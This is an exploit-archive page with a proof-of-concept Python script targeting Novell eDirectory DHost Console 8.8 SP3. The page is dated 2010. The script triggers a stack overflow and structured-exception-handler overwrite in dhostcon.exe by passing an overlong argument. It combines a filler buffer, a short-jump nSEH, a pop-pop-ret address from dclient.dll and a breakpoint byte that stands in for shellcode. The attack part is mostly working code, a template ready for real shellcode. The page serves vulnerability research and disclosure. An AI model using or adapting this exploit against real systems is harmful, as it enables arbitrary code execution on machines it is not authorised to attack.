[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite
# Published : 2010-10-17
# Author : d0lc3
# Previous Title : Opera v10.63 SVG animation Element Denial of Service
# Next Title : PHP Hosting Directory 2.0 Database Disclosure Exploit (.py)
# Exploit Title: Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite
# Date: 17/10/2010
# Author: d0lc3 (@rmallof - http://elotrolad0.blogspot.com/)
# Software Link: http://www.novell.com/
# Version: 8.8 SP3 (20216.67)]
# Tested on: win32 xp sp3 (spa)
#Summary:
# DHostCon.exe is prone to local denial of service caused by stack overflow
# triggered if user-supplied parameters are too long (1074 bytes).
# Due nature of this vulnerabilty, attackers could exploit this issue
# to execute arbitrary code on local host.
#PoC:
#!/usr/bin/python
import os,struct
def main():
path="C:NovellNDSdhostcon.exe"
args="x.x.x.x" #ip server
buf="A"*1065
nseh=struct.pack("<L",0x90909eeb) #jmp short 0012ff50 +NOP + NOP
seh=struct.pack("<L",0x61012c20) #PPR dclient.dll
shellcode=struct.pack("<B",0xCC) #INT3
crash=buf+shellcode+nseh+seh
os.system(path+" "+args+" "+crash) #Crash!
if __name__=="__main__":
main()